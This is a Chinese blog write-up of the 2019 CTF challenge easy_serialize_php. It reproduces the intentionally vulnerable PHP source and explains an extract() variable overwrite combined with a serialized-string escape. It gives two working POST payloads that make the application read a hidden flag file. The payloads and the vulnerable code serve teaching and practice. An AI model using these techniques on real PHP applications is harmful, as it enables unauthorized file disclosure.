[安洵杯 2019]easy_serialize_php

最新推荐文章于 2024-02-14 17:44:51 发布
最新推荐文章于 2024-02-14 17:44:51 发布
阅读量497 收藏 3
点赞数 1
文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/127016640
版权

题目代码

 <?php

$function = @$_GET['f'];

function filter($img){   //定义filter函数过滤
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){   //重设SESSION,使原来的销毁
    unset($_SESSION);
}

$_SESSION["user"] = 'guest'; //定义SESSION
$_SESSION['function'] = $function;

extract($_POST); //变量覆盖  可以覆盖原来的SESSION

if(!$function){  //不用管
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){     //看下面为了读取flag我们需要绕过这个东西
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION)); //利用过滤

if($function == 'highlight_file'){  //显示源代码的
    highlight_file('index.php');
}else if($function == 'phpinfo'){  //提示我们去phpinfo找hint
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){   //去读文件
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

代码审计完,我们大概思路就是利用最下面的file_get_contents去读取flag

然后利用变量覆盖得到SESSION[img],中间会给我们制造一个SESSION[img]但是不是我们要的,需要去绕过它

我们先看一下phpinfo有什么东西

 有个d0g3_f1ag.php

我们先本地调试

<?php

highlight_file('sea.php');
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

var_dump($_SESSION);
#var_dump(unserialize(filter(serialize($_SESSION))));

?>

 变量覆盖

 所以可知我们要通过POST传参通过变量覆盖构造payload读取d0g3_f1ag.php

即:_SESSION[img]=ZDBnM19mMWFnLnBocA==

但是因为

 在变量覆盖的后面,所以我们不能直接去读,这里利用反序列化字符串逃逸绕过

第一种  键逃逸

先说个知识点

unserialize会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号后面的就都被扔掉

首先我们构造一个序列化的img

 然后加上花括号

 但是现在如果反序列化是不能得到我们想要的结果

 所以利用filter函数去过滤字符使得前面的既有我们想要的,又成立,可以绕过后面的img

所以我们直接构造payload:

get:f=show_image
post:_SESSION[phpfl1g]=;s:3:"123";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

 这样我们前面的刚好满足反序列化,后面的就可以绕过了

 得到结果

 我们在对/d0g3_fllllllag进行base64加密,刚好是20位,直接替换原来的就行

 

 第二种 值绕过

payload:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

值绕过,原理是相似的

 

白塔河冲浪手
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3043
[安洵 2019]easy_serialize_php 反序列化
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 439
buuctf[安洵 2019]easy_serialize_php
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
[安洵 2019]easy_serialize_php 详解
最新发布
weixin_62306641的博客
02-14 252
在这道题中是将falg,php.......等字符串替换为空,替换完成后对象名,对象的类型,对象的长度都没变,但是内容没了。那么他就会依据长度吧后面的内容给囊括进去。反序列化中的对象是以{}作为开头结尾的,并且有对象名,对象的类型,对象的长度。但是他给出的例子中并没有$_SESSION[img'],这时候就需要利用到php反序列化逃逸。巧合地是,这时候又变成了一个完整的反序列化内容,又可以被解析,于是我们就可以依据这点来利用。从上述例子可以看出来,当序列化再反序列化后,依旧可以根据键名的到值。
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 432
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
[安洵 2019]easy_serialize_php 1
shinygod的博客
03-04 1773
知识点:反序列化字符串逃逸(2种情形),extract变量覆盖漏洞 目录反序列化字符串逃逸反序列化的规则00x1:过滤后字符变多00x1:过滤后字符变少(本题就是此类型)值替换键替换 反序列化字符串逃逸 一般这类漏洞,都是在序列化之后,过滤,然后反序列化引起的。 反序列化的规则 了解反序列化字符串逃逸之前,先了解反序列化的规则 例如: a:2:{s:4:"user";s:5:"guest";s:8:"function";s:3:"aaa";} //第一个a代表这是一个数组序列化 php反序列化会以 ;
easy_serialize_php(反序列化字符逃逸)
weixin_45007073的博客
03-16 1024
前言 今天突然想起来代码审计好像很久没搞了,在网上找到了个2019安洵的题目。题目的考点是反序列化字符逃逸,通过字符的逃逸我们才能拿到对应的flag值。 反序列化原理 我们要了解反序列化字符逃逸的原理,首先就要先了解反序列化的原理,我们先举个简单的例子帮助理解和分析。 <?php $img["one"] = "flag"; $img["two"] = "test"; $a = serialize($img); var_dump($a); $b = unserialize($a); va

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值